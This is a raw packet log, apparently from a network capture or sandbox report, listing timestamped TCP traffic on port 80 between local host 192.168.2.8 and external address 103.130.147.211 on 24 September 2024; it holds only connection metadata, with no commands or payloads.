                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438811064 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438822031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438849926 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438862085 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438873053 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438879967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438884974 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438884974 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438900948 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438909054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438921928 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438929081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438970089 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438970089 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439150095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439158916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439234972 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439304113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439311981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439326048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439342022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439349890 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439367056 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439378977 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439388037 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439388037 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439412117 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439419985 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439426899 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439429998 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439441919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439455986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439485073 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439485073 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439491987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439634085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439681053 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439687967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439707994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439719915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439734936 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439738035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439749956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439798117 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439821005 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439826965 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439835072 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.439841986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440016985 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440035105 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440042973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440057039 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440073013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440079927 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440094948 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440112114 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440113068 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440113068 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440124035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440130949 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440138102 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440145969 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440160036 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440166950 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440174103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440177917 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440179110 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440190077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440200090 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440212011 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440220118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440259933 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440259933 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440577030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440584898 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440599918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440614939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440623999 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440643072 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440651894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440659046 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440663099 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440663099 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440690994 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.440720081 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476809025 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476815939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476835966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476881981 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476886988 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476895094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476907015 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476913929 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476918936 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476977110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476983070 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476984978 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.476984978 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.477267981 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502379894 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502389908 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502398014 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502404928 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502425909 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502434015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502440929 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502497911 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502511024 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502520084 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502535105 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502540112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502552032 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502559900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502571106 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502580881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502588987 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502605915 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502619982 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502619982 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502628088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502644062 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502645016 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502682924 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502686024 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502693892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502706051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502716064 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502794027 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502821922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502830029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502840996 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502861023 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502863884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502863884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502872944 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502886057 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502897024 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502907991 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502914906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502923965 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502931118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502945900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502960920 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502968073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502973080 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502983093 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.502990961 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503014088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503021002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503041029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503077030 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503087044 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503087044 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503114939 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503232956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503241062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503247976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503258944 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503271103 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503288984 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503299952 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503303051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503313065 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503325939 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503326893 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503334045 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503353119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503360987 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503361940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503406048 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503412962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503420115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503427029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503447056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503454924 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503454924 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503458023 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503468037 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503488064 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503494978 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503511906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503514051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503525972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503535032 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503539085 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503556967 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503592968 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503593922 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503670931 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503690004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503707886 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503710032 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503716946 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503755093 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503762960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503767014 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503783941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503798008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503813982 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503844023 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.503890038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504028082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504048109 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504067898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504081011 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504081964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504101038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504108906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504122972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504146099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504787922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504831076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504878998 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504887104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504895926 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504950047 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504957914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504986048 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.504998922 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505026102 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505033970 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505040884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505075932 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505234003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505274057 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505283117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505291939 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505342960 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505398035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505405903 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505440950 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505465984 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505467892 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505477905 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505491972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505517006 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505640030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505729914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505745888 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505774021 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505809069 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505853891 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505861998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505868912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505896091 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505903006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505911112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505948067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.505978107 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506020069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506027937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506057978 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506077051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506077051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506093979 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506107092 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506115913 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506146908 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.506180048 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509685040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509702921 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509727001 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509757996 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509784937 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509823084 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509829998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509836912 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509843111 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509855986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509892941 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509892941 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.509963036 CEST4973480192.168.2.8103.130.147.211
